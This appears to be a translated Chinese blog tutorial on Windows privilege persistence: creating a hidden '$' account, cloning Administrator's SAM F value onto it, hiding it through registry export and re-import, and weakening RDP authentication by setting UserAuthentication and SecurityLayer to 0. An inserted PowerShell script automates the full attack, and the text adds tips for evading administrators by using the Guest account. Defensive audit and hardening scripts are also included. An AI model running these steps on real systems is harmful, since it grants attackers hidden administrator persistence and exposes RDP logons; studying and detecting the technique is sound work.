[Xiaobai's Learning Advancement Road #Privilege Maintenance] P1: Creating and using hidden users

1. Creating and using hidden users (shadow users) for privilege maintenance

> Preconditions: ① administrator privileges on the target; ② a shell environment such as a cmd shell.

System: Windows 10 x64 Professional Edition

### Operation steps (Windows 10 as the example)

0×01. First, from the cmd shell, add a user whose name ends in `$`, for example admin$ with the password 123456. Commands:

net user admin$ 123456 /add #add user admin$

net localgroup administrators admin$ /add #Add the admin$ user to the local administrators group

**Because the user name ends with `$` (a Windows naming convention for hidden names), `net user` does not list the account at the command prompt.** At this point you can already log in over 3389 (RDP) as admin$, but the concealment is still weak: the account shows up under Computer Management > Local Users and Groups, so further steps are required.

0×02. Modify the registry so the account is visible neither at the command prompt nor in the management tools. **Once the shadow user has been created from the shell, use it to log in over 3389 and edit the registry on the target machine to improve its concealment.** Run regedit and navigate to HKEY_LOCAL_MACHINE\SAM\SAM. Select the SAM key, open **"Edit > Permissions"** from the menu bar, grant the Administrators group Full Control, and save.

(Be careful with Deny entries: a Deny Full Control entry on this key is effectively irreversible from a normal administrator session, and a mistake here causes serious problems, so do not tick Deny for Full Control. The same idea can be used offensively: after the registry edits below, denying SYSTEM and Administrators access to the key stops administrators from deleting this user.)

After setting the permissions, return to the main registry view; the previously hidden subkeys under SAM are now visible. Navigate to SAM > Domains > Account > Users and Names. Under Names there is one key per account; find the Administrator and admin$ entries. The default value of each Names key has its data type set to the account's RID, which is also the name of the corresponding key under Users (Administrator, RID 500, is 000001F4; admin$ here is 000003E9). Each Users key holds an F value: fixed-length binary account data that contains, among other fields, the RID (at offset 0x30) and the account flags. Copy the binary data of Administrator's F value, open the F value of admin$ (the 000003E9 key), paste it over the existing data, and save. The admin$ record now carries Administrator's RID.

After the replacement, export the admin$ key under Names and the 000003E9 key under Users (right-click the key > Export) as .reg files.

Then, from the cmd shell (administrator privileges), delete the admin$ account:

net user admin$ /del #after this the account's Names and Users keys disappear from the registry

Now import the two exported backups (double-click the .reg files, or use File > Import in regedit). The import succeeds:
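The steps 0×01 and 0×02 above, carried out from an elevated PowerShell 5.1 session instead of regedit, as an added example that is not part of the original post. `admin$` and `123456` are the post's example values; the backup directory is an assumption. It grants Administrators Full Control on HKLM\SAM\SAM programmatically, locates the two account records by RID, copies Administrator's F value, exports, deletes and re-imports, then reads the RID back out of the restored F value.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original post: automates steps 0x01 and 0x02 in an
# elevated PowerShell 5.1 session on Windows 10. 'admin$'/'123456' are the post's
# example values; $BackupDir is an assumption.
param(
    [string]$ShadowUser = 'admin$',
    [string]$Password   = '123456',
    [string]$BackupDir  = "$env:TEMP\sam-backup"
)
$ErrorActionPreference = 'Stop'
$SamRoot = 'HKLM:\SAM\SAM'

# Step 0x01: create the $-suffixed account and add it to Administrators.
net user $ShadowUser $Password /add | Out-Null
net localgroup administrators $ShadowUser /add | Out-Null

# Step 0x02 (permissions): grant BUILTIN\Administrators Full Control on HKLM\SAM\SAM,
# inherited by its subkeys. Administrators hold WRITE_DAC on this key by default, which
# is what makes the grant possible. Never add a Deny entry: it locks this session out too.
$check  = [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree
$rights = [System.Security.AccessControl.RegistryRights]'ReadPermissions, ChangePermissions'
$key    = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SAM\SAM', $check, $rights)
$acl    = $key.GetAccessControl()
$rule   = New-Object -TypeName System.Security.AccessControl.RegistryAccessRule -ArgumentList @(
    'BUILTIN\Administrators', 'FullControl', 'ContainerInherit', 'None', 'Allow')
$acl.AddAccessRule($rule)
$key.SetAccessControl($acl)
$key.Close()

# Step 0x02 (locate records): the key under Users is the account RID as 8 hex digits
# (Administrator = RID 500 = 000001F4), so derive it from the SID rather than parsing Names.
function Get-SamUserKey([string]$Name) {
    $rid = [uint32](Get-LocalUser -Name $Name).SID.Value.Split('-')[-1]
    return '{0}\Domains\Account\Users\{1:X8}' -f $SamRoot, $rid
}
$adminKey  = Get-SamUserKey -Name 'Administrator'
$shadowKey = Get-SamUserKey -Name $ShadowUser

# Step 0x02 (clone): copy Administrator's F value (binary account record; the RID is the
# little-endian DWORD at offset 0x30) over the shadow account's F value.
$adminF = (Get-ItemProperty -Path $adminKey -Name F).F
Set-ItemProperty -Path $shadowKey -Name F -Value $adminF -Type Binary

# Step 0x02 (export / delete / import): back up the account's Names and Users keys,
# delete the account (which removes both keys), then restore the keys from the backups.
New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
$namesReg = "HKLM\SAM\SAM\Domains\Account\Users\Names\$ShadowUser"
$usersReg = $shadowKey -replace '^HKLM:', 'HKLM'
reg export $namesReg "$BackupDir\names.reg" /y | Out-Null
reg export $usersReg "$BackupDir\user.reg"  /y | Out-Null
net user $ShadowUser /del | Out-Null
reg import "$BackupDir\names.reg" | Out-Null
reg import "$BackupDir\user.reg"  | Out-Null

# Verify: the restored record still lives under the original RID's key name, but its
# F value now carries RID 500.
$f = (Get-ItemProperty -Path $shadowKey -Name F).F
'{0}: key {1}, RID in F = {2}' -f $ShadowUser, (Split-Path -Path $shadowKey -Leaf), [BitConverter]::ToUInt32($f, 0x30)
```

Run it once, as administrator, on a test VM only: the permission change on HKLM\SAM\SAM persists, and both it and the RID mismatch between key name and F value are exactly what a defender looks for. If the later RDP login is refused as "not authorized for remote login", the Remote Desktop "Select Users" step the post describes below still has to be done by hand.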

After the import succeeds, go back to Local Users and Groups in the management tools: the admin$ account appears in neither the users nor the groups list. In fact the account can still be used to log in over RDP with its password, and when it does it is **equivalent to Administrator**.

Open 3389 and try to log in; a problem appears: the connection is refused because the user is not authorized for remote login. This adds one more condition for use: add the admin$ user in the "Select Users" dialog at the lower right of the Remote Desktop settings (System Properties > Remote), after which the 3389 login works normally. Login succeeds after the change.

### 0×01 Details expansion:

Next, still working from the remote logon screen as in a real engagement, one more setting has to be dealt with: the user authentication setting (Network Level Authentication, NLA), which governs authentication of remote connections. **The author shows the difference between the setting on and off with two screenshots (not reproduced here).**

Key point! **When NLA is on, the remote logon screen cannot be reached without a valid account and password; when it is off, the Windows logon screen is shown regardless of whether the entered account and password are correct.** To turn NLA off, use the following command:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

> 0 means off, 1 means on (`/f` overwrites an existing value without prompting, which matters in a non-interactive shell). Turning NLA off alone is not enough; the SecurityLayer value must also be lowered. **Specifically: 0 means the legacy RDP protocol handles authentication before the connection is established (RDP meaning Remote Desktop Protocol), which can be understood as turning verification off; 1 means the two ends negotiate the security layer before connecting, which the author reports as the default; 2 means TLS.** Set it to 0 with the following command:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f

> In the author's test, with both values set to 0 (one of the two may already remove the verification, but it is best to set both), the 3389 logon screen can be reached without entering correct credentials.

All of the above assumes the target has Remote Desktop enabled, so it is also worth knowing how to enable it. First configure the firewall to allow Remote Desktop connections. Command:

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

netsh is the Windows network configuration command; advfirewall firewall addresses the advanced firewall; add rule adds a rule; name sets the rule name, protocol the protocol, dir the direction (in or out), localport the port, and action=allow the action.

Then enable Remote Desktop itself through the registry by executing the following command:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

(Note the space in "Terminal Server"; fDenyTSConnections=0 allows connections, 1 denies them.) After the above, the server's RDP logon screen opens without a correct password: entering the IP in Remote Desktop Connection jumps straight to the target's lock screen, and you reach the logon page without credential authentication:
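The three registry values and the firewall rule changed in this section, read back and assessed from PowerShell, as an added example that is not part of the original post. It assumes an elevated PowerShell 5.1 session on Windows 10 with the built-in NetSecurity module, and that the firewall rule carries the display name `Remote Desktop` given to it by the netsh command above. `Get-RdpExposure` reports the weakened state the post relies on; `Set-RdpHardened` puts NLA and TLS back.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original post: audit and remediation for the RDP settings
# changed above (fDenyTSConnections, UserAuthentication, SecurityLayer, firewall rule).
$TsKey      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$TcpKey     = "$TsKey\WinStations\RDP-Tcp"
$LayerNames = @{ 0 = 'RDP security layer (legacy)'; 1 = 'Negotiate'; 2 = 'TLS' }

function Get-RdpExposure {
    $ts   = Get-ItemProperty -Path $TsKey
    $tcp  = Get-ItemProperty -Path $TcpKey
    # The rule name the post's netsh command creates (assumption: unchanged since).
    $rule = Get-NetFirewallRule -DisplayName 'Remote Desktop' -ErrorAction SilentlyContinue

    $rdpOn = ($ts.fDenyTSConnections -eq 0)
    $nlaOn = ($tcp.UserAuthentication -eq 1)
    $layer = if ($null -eq $tcp.SecurityLayer) { 'not set' } else { $LayerNames[[int]$tcp.SecurityLayer] }

    [pscustomobject]@{
        RdpEnabled         = $rdpOn
        NlaEnabled         = $nlaOn
        SecurityLayer      = $layer
        AddedFirewallRule  = [bool]$rule
        # The condition the post exploits: anyone who can reach TCP/3389 gets the Windows
        # logon screen before any credential has been checked.
        LogonScreenExposed = ($rdpOn -and -not $nlaOn)
    }
}

function Set-RdpHardened {
    # NLA on (1) and TLS (2), the strongest of the three SecurityLayer values listed above.
    Set-ItemProperty -Path $TcpKey -Name UserAuthentication -Value 1 -Type DWord
    Set-ItemProperty -Path $TcpKey -Name SecurityLayer      -Value 2 -Type DWord
    Get-RdpExposure
}

Get-RdpExposure | Format-List
```

`LogonScreenExposed` is true exactly when the post's two commands have been applied on a host with Remote Desktop enabled; a true value on a production host warrants checking who changed the RDP-Tcp values and when. Whether Remote Desktop should stay enabled at all is a separate decision, so the remediation function deliberately leaves fDenyTSConnections alone.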

### 0×02 Idea extension

What is shown here is the creation and use of a shadow user built from a newly added account. A vigilant administrator may well find it in the registry. Setting a Deny entry (the Deny option for Full Control in the permissions dialog) would effectively stop the account from being deleted by force, but it also causes bigger problems later. Logging in over 3389 with the newly created shadow user generates data that is easy to find, and on Windows 10 extra conditions have to be met before the 3389 login works. Two extensions follow from this: ① instead of adding a new account, enable the built-in Guest account and replace its F value in the registry in the same way; logging in as Guest then draws less unwanted attention. ② In the dialog for adding authorized Remote Desktop users, add all known users, so that the administrator does not spot the shadow user too early.
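The defender's side of everything above, as an added example that is not part of the original post: a PowerShell 5.1 audit that reads the SAM hive directly and looks for the three traces the technique leaves (a name in SAM\Names that the OS no longer enumerates or that ends in `$`, a Users record whose F value carries a RID that does not match its key name, and the changed ACL on HKLM\SAM\SAM). Reading the hive needs the same Administrators Full Control grant the post describes, or a SYSTEM context (for example PsExec -s), which is an assumption about how you run it.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original post: defender-side audit for the shadow-user
# technique. Reads HKLM\SAM\SAM directly, so run it as SYSTEM or after the same
# Administrators Full Control grant the post describes (assumption about the context).
function Find-ShadowUsers {
    $samKey   = 'HKLM:\SAM\SAM'
    $usersKey = "$samKey\Domains\Account\Users"
    $visible  = @(Get-LocalUser | Select-Object -ExpandProperty Name)
    $findings = @()

    # 1. Accounts present in SAM\Names that the OS no longer enumerates (delete + re-import),
    #    and $-suffixed names that "net user" hides.
    foreach ($nameKey in Get-ChildItem -Path "$usersKey\Names") {
        $n = $nameKey.PSChildName
        if ($visible -notcontains $n) {
            $findings += [pscustomobject]@{ Account = $n; Indicator = 'in SAM\Names but not returned by Get-LocalUser' }
        }
        if ($n.EndsWith('$')) {
            $findings += [pscustomobject]@{ Account = $n; Indicator = 'name ends in $, hidden from "net user"' }
        }
    }

    # 2. Users\<RID> records whose F value carries a different RID than the key name:
    #    the signature of an F value copied from Administrator (RID 500).
    foreach ($userKey in Get-ChildItem -Path $usersKey) {
        if ($userKey.PSChildName -notmatch '^[0-9A-F]{8}$') { continue }   # skips "Names"
        $keyRid = [Convert]::ToUInt32($userKey.PSChildName, 16)
        $f      = (Get-ItemProperty -Path $userKey.PSPath -Name F).F
        $fRid   = [BitConverter]::ToUInt32($f, 0x30)
        if ($fRid -ne $keyRid) {
            $findings += [pscustomobject]@{ Account = $userKey.PSChildName; Indicator = "F value RID $fRid != key RID $keyRid (cloned record)" }
        }
    }

    # 3. The permission change is itself an indicator: Administrators normally hold only
    #    Read Control / Write DAC on HKLM\SAM\SAM, not Full Control, and there are no Deny entries.
    foreach ($ace in (Get-Acl -Path $samKey).Access) {
        if ($ace.RegistryRights -eq 'FullControl' -and $ace.IdentityReference -like '*\Administrators') {
            $findings += [pscustomobject]@{ Account = 'HKLM\SAM\SAM'; Indicator = 'Administrators granted Full Control' }
        }
        if ($ace.AccessControlType -eq 'Deny') {
            $findings += [pscustomobject]@{ Account = 'HKLM\SAM\SAM'; Indicator = "Deny ACE for $($ace.IdentityReference)" }
        }
    }
    return $findings
}

Find-ShadowUsers | Format-Table -AutoSize
```

Check 2 is the one that catches the Guest variant from extension ①, since it does not depend on the account name at all; check 1 alone would miss a cloned Guest, while check 3 fires as soon as the permission step has been done, before any account has been touched.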

Finally

Here is a quick way to learn network security, "perhaps" the most comprehensive learning method:
1. Network security theoretical knowledge (2 days)
① Understand the industry-related background, prospects, and determine the development direction.
②Learn laws and regulations related to network security.
③The concept of network security operation.
④ Introduction to MLPS (Multi-Level Protection Scheme) compliance: its regulations, procedures and standards. (Very important)

2. Penetration testing basics (one week)
①Penetration testing process, classification, standards
②Information collection technology: active/passive information collection, Nmap tools, Google Hacking
③ Vulnerability scanning and exploitation: principles, methods, tools (MSF), bypassing IDS and anti-virus detection
④ Host attack and defense drills: MS17-010, MS08-067, MS10-046, MS12-020, etc.

3. Operating system basics (one week)
①Common functions and commands of Windows system
②Common functions and commands of Kali Linux system
③Operating system security (system intrusion troubleshooting/system reinforcement basis)

4. Computer network foundation (one week)
①Computer network foundation, protocol and architecture
②Network communication principle, OSI model, data forwarding process
③Common protocol analysis (HTTP, TCP/IP, ARP, etc.)
④Network attack technology and network security defense technology
⑤ Web vulnerability principles and defense: active/passive attacks, DDoS attacks, CVE vulnerability reproduction

5. Basic database operations (2 days)
①Database basics
②SQL language basics
③Database security reinforcement

6. Web penetration (1 week)
①Introduction to HTML, CSS and JavaScript
②OWASP Top10
③Web vulnerability scanning tools
④ Web penetration tools: Nmap, BurpSuite, SQLMap, others (China Chopper, vulnerability scanners, etc.)


Congratulations: if you learn this much, you can basically work in a network-security-related job such as penetration testing, web penetration, security services or security analysis; if you also learn the security modules well, you can work as a security engineer. The salary range is 6k-15k.

So far, about a month. You have become a "script kiddie". Do you still want to go further?




Origin blog.csdn.net/web22050702/article/details/131851208